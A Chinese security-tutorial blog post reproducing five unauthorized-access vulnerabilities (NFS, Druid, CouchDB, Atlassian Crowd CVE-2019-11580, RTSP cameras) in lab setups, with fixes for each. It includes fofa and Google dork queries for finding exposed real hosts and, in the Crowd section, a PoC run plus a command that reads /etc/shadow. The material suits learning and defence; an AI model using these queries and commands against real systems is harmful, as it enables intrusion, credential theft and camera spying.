三十种未授权访问漏洞复现 合集( 五 )

++未授权访问漏洞介绍++

未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历
目前主要存在未授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTPGitLab, Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
未授权访问漏洞的复现思路:
1.使用靶场进行漏洞复现:(1)vulhub(2)本地搭建靶场
2.使用漏洞扫描工具进行扫描(1)github-功能受限(2)Python-定制化的完成漏洞扫描的利用

二十一:NSF共享目录未授权访问

》》》漏洞简介《《《

Network File System(NFS),是由SUN公司研制的UNIX表示层协议(pressentation layerprotocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后,由于nfs服务未限制对外访问,导致共享目录泄漏。

》》》漏洞复现《《《

fofa搜索语句:"nfs" port="2049" port="20048"

#安装nfs客户端

apt install nfs-common

#查看nfs服务器上的共享目录

showmount -e 192.168.126.130
#挂载相应共享目录到本地

mount -t nfs 192.168.126.130:/grdata /mnt
#卸载目录

umount /mnt

》》》漏洞修复建议《《《

1.利用iptables限制端口2049和20048端口的访问,禁止外部访问;

2.设置/etc/exports,对访问进行控制;

二十二:Druid未授权访问漏洞

》》》漏洞简介《《《

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径

漏洞特征:http://www.xxxx.com/druid/index.html

/druid/websession.html

/system/druid/websession.html

/webpage/system/druid/websession.html(jeecg)

》》》漏洞复现《《《

fofa语句:title="Druid Stat Index"

# PHPINFO页面

inurl:phpinfo.php

intitle:phpinfo()

info.php test.php
# Druid未授权访问

inurl:"druid/index.html"

intitle:"Druid Stat Index'

直接在网站的url中后加上:

1 /druid/index.html

2 /druid/websession.html

3 /druid/datasource.html

4 /druid/sql.html

5 /druid/spring.html

如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞

》》》漏洞修复建议《《《

1.配置访问账号密码。

2.禁止对外网开放访问。

二十三:CouchDB未授权访问

》》》漏洞简介《《《

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是-个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NOSQL数据库。应用广泛,如BBC用在其动态内容展示平台,CreditSuisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。默认端口是6984
影响版本:小于 1.7.0 以及 小于 2.1.1

》》》漏洞复现《《《

fofa语法

(port="5984")&&(is_honeypot=false && is_fraud=false)

Vulhub靶场

cd /vulhub/couchdb/CVE-2017-12636

docker-compose up -d
执行未授权访问测试命令..

curl 192.168.1.4:5984

curl 192.168.1.4:5984/_config

》》》漏洞修复建议《《《

1.指定CouchDB绑定的IP (需要重启CouchDB才能生效)在/etc/couchdb/local.ini 文件中找到"bind address=0.0.0.0",把 0.0.0.0修改为 127.0.0.1 ,然后保存。 注:修改后只有本机才能访问CouchDB。

2.设置访问密码(需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 中找到"[admins"字段配置密码。

3.设置WWW-Authenticate,强制认证。

二十四:Altassian Crowd未授权访问漏洞

》》》漏洞简介《《《

Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。AtlassianCrowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd DataCenter安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。其端口:8095

》》》漏洞复现《《《

影响版本

2.1.0 <= version < 3.0.5

3.1.0 <= version < 3.1.6

3.2.0<= version < 3.2.8

3.3.0 <= version < 3.3.5

3.4.0 <= version < 3.4.4

复制代码
漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580

1 git clone https://github.com/jas502n/CVE-2019-11580

2 cd CVE-2019-11580/

3 python CVE-2019-11580.py http://192.168.18.138:8095

4 curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

》》》漏洞修复建议《《《

设置访问/crowd/admin/uploadplugin.action的源ip.

升级最新版本(3.5.0以上)。

二十五:RTSP未授权访问漏洞

》》》漏洞简介《《《

RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。攻击者可通过VLC等视频播放软件打开rtsp地址进行摄像头画面的实时查看。

》》》漏洞复现《《《

fofa语句:(port="554")&&(is_honeypot=false && is_fraud=false)&& protocol="rtsp"

》》》漏洞修复建议《《《

1.修改默认口令。

2.禁止开放到外网。

相关推荐
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
DianSan_ERP6 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全